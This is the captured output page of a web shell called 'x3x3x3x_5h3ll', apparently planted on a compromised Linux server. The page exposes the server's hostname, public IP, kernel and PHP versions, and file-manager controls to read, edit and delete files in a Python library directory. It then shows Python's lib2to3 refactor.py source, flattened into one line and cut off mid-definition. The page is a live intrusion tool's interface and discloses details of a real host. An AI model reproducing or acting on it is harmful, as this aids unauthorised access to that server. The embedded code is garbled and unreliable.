x3x3x3x_5h3ll
— 53cur3 — 5h3ll_1d —
Linux vps-10654784.cedaps.org.br 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
  INFO SERVER : Apache PHP : 7.4.33
/lib64/python3.6/lib2to3/
162.240.100.168

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACTN ]
+FILE +DIR
__pycache__ dir drwxr-xr-x 2024-10-07 16:37 R D
fixes dir drwxr-xr-x 2024-10-07 16:37 R D
pgen2 dir drwxr-xr-x 2024-10-07 16:37 R D
Grammar.txt 6.408 KB -rw-r--r-- 2018-12-23 21:37 R E G D
Grammar3.6.8.final.0.pickle 31.496 KB -rw-r--r-- 2024-09-24 14:11 R E G D
PatternGrammar.txt 0.774 KB -rw-r--r-- 2018-12-23 21:37 R E G D
PatternGrammar3.6.8.final.0.pickle 2.044 KB -rw-r--r-- 2024-09-24 14:11 R E G D
__init__.py 0.007 KB -rw-r--r-- 2018-12-23 21:37 R E G D
__main__.py 0.065 KB -rw-r--r-- 2018-12-23 21:37 R E G D
btm_matcher.py 6.673 KB -rw-r--r-- 2018-12-23 21:37 R E G D
btm_utils.py 9.732 KB -rw-r--r-- 2018-12-23 21:37 R E G D
fixer_base.py 6.533 KB -rw-r--r-- 2018-12-23 21:37 R E G D
fixer_util.py 14.851 KB -rw-r--r-- 2018-12-23 21:37 R E G D
main.py 11.38 KB -rw-r--r-- 2018-12-23 21:37 R E G D
patcomp.py 6.879 KB -rw-r--r-- 2018-12-23 21:37 R E G D
pygram.py 1.127 KB -rw-r--r-- 2018-12-23 21:37 R E G D
pytree.py 27.395 KB -rw-r--r-- 2018-12-23 21:37 R E G D
refactor.py 27.31 KB -rw-r--r-- 2018-12-23 21:37 R E G D
REQUEST EXIT
# Copyright 2006 Google, Inc. All Rights Reserved. # Licensed to PSF under a Contributor Agreement. """Refactoring framework. Used as a main program, this can refactor any number of files and/or recursively descend down directories. Imported as a module, this provides infrastructure to write your own refactoring tool. """ __author__ = "Guido van Rossum " # Python imports import os import sys import logging import operator import collections import io from itertools import chain # Local imports from .pgen2 import driver, tokenize, token from .fixer_util import find_root from . import pytree, pygram from . import btm_matcher as bm def get_all_fix_names(fixer_pkg, remove_prefix=True): """Return a sorted list of all available fix names in the given package.""" pkg = __import__(fixer_pkg, [], [], ["*"]) fixer_dir = os.path.dirname(pkg.__file__) fix_names = [] for name in sorted(os.listdir(fixer_dir)): if name.startswith("fix_") and name.endswith(".py"): if remove_prefix: name = name[4:] fix_names.append(name[:-3]) return fix_names class _EveryNode(Exception): pass def _get_head_types(pat): """ Accepts a pytree Pattern Node and returns a set of the pattern types which will match first. """ if isinstance(pat, (pytree.NodePattern, pytree.LeafPattern)): # NodePatters must either have no type and no content # or a type and content -- so they don't get any farther # Always return leafs if pat.type is None: raise _EveryNode return {pat.type} if isinstance(pat, pytree.NegatedPattern): if pat.content: return _get_head_types(pat.content) raise _EveryNode # Negated Patterns don't have a type if isinstance(pat, pytree.WildcardPattern): # Recurse on each node in content r = set() for p in pat.content: for x in p: r.update(_get_head_types(x)) return r raise Exception("Oh no! I don't understand pattern %s" %(pat)) def _get_headnode_dict(fixer_list): """ Accepts a list of fixers and returns a dictionary of head node type --> fixer list. """ head_nodes = collections.defaultdict(list) every = [] for fixer in fixer_list: if fixer.pattern: try: heads = _get_head_types(fixer.pattern) except _EveryNode: every.append(fixer) else: for node_type in heads: head_nodes[node_type].append(fixer) else: if fixer._accept_type is not None: head_nodes[fixer._accept_type].append(fixer) else: every.append(fixer) for node_type in chain(pygram.python_grammar.symbol2number.values(), pygram.python_grammar.tokens): head_nodes[node_type].extend(every) return dict(head_nodes) def get_fixers_from_package(pkg_name): """ Return the fully qualified names for fixers in the package pkg_name. """ return [pkg_name + "." + fix_name for fix_name in get_all_fix_names(pkg_name, False)] def _identity(obj): return obj if sys.version_info < (3, 0): import codecs _open_with_encoding = codecs.open # codecs.open doesn't translate newlines sadly. def _from_system_newlines(input): return input.replace("\r\n", "\n") def _to_system_newlines(input): if os.linesep != "\n": return input.replace("\n", os.linesep) else: return input else: _open_with_encoding = open _from_system_newlines = _identity _to_system_newlines = _identity def _detect_future_features(source): have_docstring = False gen = tokenize.generate_tokens(io.StringIO(source).readline) def advance(): tok = next(gen) return tok[0], tok[1] ignore = frozenset({token.NEWLINE, tokenize.NL, token.COMMENT}) features = set() try: while True: tp, value = advance() if tp in ignore: continue elif tp == token.STRING: if have_docstring: break have_docstring = True elif tp == token.NAME and value == "from": tp, value = advance() if tp != token.NAME or value != "__future__": break tp, value = advance() if tp != token.NAME or value != "import": break tp, value = advance() if tp == token.OP and value == "(": tp, value = advance() while tp == token.NAME: features.add(value) tp, value = advance() if tp != token.OP or value != ",": break tp, value = advance() else: break except StopIteration: pass return frozenset(features) class FixerError(Exception): """A fixer could not be loaded.""" class RefactoringTool(object): _default_options = {"print_function" : False, "write_unchanged_files" : False} CLASS_PREFIX = "Fix" # The prefix for fixer classes FILE_PREFIX = "fix_" # The prefix for modules with a fixer within def __init__(s